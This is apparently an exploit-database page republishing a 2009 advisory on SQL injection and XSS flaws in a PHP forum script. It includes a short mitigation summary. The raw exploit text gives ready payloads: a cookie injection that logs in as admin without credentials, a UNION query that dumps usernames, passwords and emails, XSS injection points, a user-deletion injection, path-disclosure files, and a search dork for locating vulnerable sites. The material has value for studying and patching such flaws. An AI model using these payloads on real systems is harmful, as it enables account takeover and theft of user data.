header-logo
Suggest Exploit
vendor:
by:
eLwaux
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2009

Blind SQLinj

Blind SQL Injection vulnerability in /index.php allows an attacker to manipulate the SQL query by injecting malicious input in the 'enter_login' and 'enter_parol' cookies. The vulnerability can be exploited to bypass authentication and gain unauthorized access to the system.

Mitigation:

To mitigate this vulnerability, ensure that user input is properly sanitized and validated before being used in SQL queries. Use prepared statements or parameterized queries to prevent SQL injection attacks. Avoid storing sensitive information, such as passwords, in plain text.
Source

Exploit-DB raw data:

dork: "Copyright KerviNet"
eLwaux(c) 20.06.2009

## ## ## ##
Blind SQLinj
/index.php
-------------------------------------------------------------------------------------------------
if($_COOKIE['user_enter']=="auto") {
$enter_login=$_COOKIE['enter_login'];
$enter_parol=$_COOKIE['enter_parol'];
$mysql->query("SELECT name, pass, status FROM users WHERE name =
'".$enter_login."' AND pass = '".$enter_parol."'");
-------------------------------------------------------------------------------------------------
exploit:
  COOKIE: user_enter=auto
  COOKIE: enter_login = abc
  COOKIE: enter_parol = ' or name = (select name from users where
id_user=1) and '1'='1';
  sqlQuery: SELECT name, pass, status FROM users WHERE name = 'abc'
AND pass = '' or name = (select name from users where id_user<10 limit
1)
и вы автоматом зайдете под админом, даже не зная его имени (:



## ## ## ##
SQLinj
/message.php
-------------------------------------------------------------------------------------------------
9:  $topic=$_GET['topic'];
18: if($topic) {
69: $mysql->query("SELECT name, viewing, voting, status, top_status,
id_forum FROM topics WHERE id_topic = ".$topic);
exploit:/message.php?topic=-1+union+select+1,concat_ws(0x3a,id_user,name,pass,email),3,4,5,6+from+users
-------------------------------------------------------------------------------------------------


## ## ## ##
SiXSS
/message.php
exploit:/message.php?topic=-1+union+select+1,'{XSS}',3,4,5,6+from+users


## ## ## ##
aXSS
/add_voting.php
-------------------------------------------------------------------------------------------------
22: $topic=$_GET['topic'];
61: if($topic) {
66: 	 $forum_edit->add_voting($time, $topic, $v_vopros, $variants);
74: }

function add_voting($time, $topic, $v_vopros, $variants) {
global $user;
global $user_ip;
if($user) {
global $mysql;
$mysql->query("UPDATE topics SET voting = 1 WHERE id_topic = ".$topic);
$mysql->query("INSERT INTO v_name VALUES (0, '".$v_vopros."', ".$topic.")");
$id_vname=mysql_insert_id();
for($i=0; $i<count($variants); $i+=1) {
$vr_nom=$i+1;
$mysql->query("INSERT INTO v_variants VALUES (".$vr_nom.",
'".$variants[$i]."', ".$id_vname.")");
}
}
return $id_vname;
}
-------------------------------------------------------------------------------------------------

exploit:/add_voting.php?topic=1
   POST: add_voting = ok_add
   POST: v_vopros = v
   POST: v_variant1 = {XSS}
   POST: v_variant2 = v2


## ## ## ##
users deleating
/admin/edit_user.php
-------------------------------------------------------------------------------------------------
$del_user_id=$_POST['del_user_id'];
$mysql->query("DELETE FROM users WHERE id_user = ".$del_user_id);
-------------------------------------------------------------------------------------------------
exploit:
   POST: del_user_id=(select user_id from users limit 1)


## ## ## ##
Path Disclosure
-------------------------------------------------------------------------------------------------
/include_files/voting_diagram.php
/include_files/voting.php
/include_files/topics_search.php
/include_files/topics_list.php
/include_files/top_part.php
/include_files/quick_search.php
/include_files/quick_reply.php
/include_files/moder_menu.php
/include_files/messages_list.php
/include_files/menu.php
/include_files/head.php
/include_files/forums_list.php
/include_files/forum_statistics.php
/include_files/forum_info.php
/include_files/birthday.php
/admin/head.php
-------------------------------------------------------------------------------------------------

# milw0rm.com [2009-07-01]

Navigation

Suggest Exploit

Services By CQR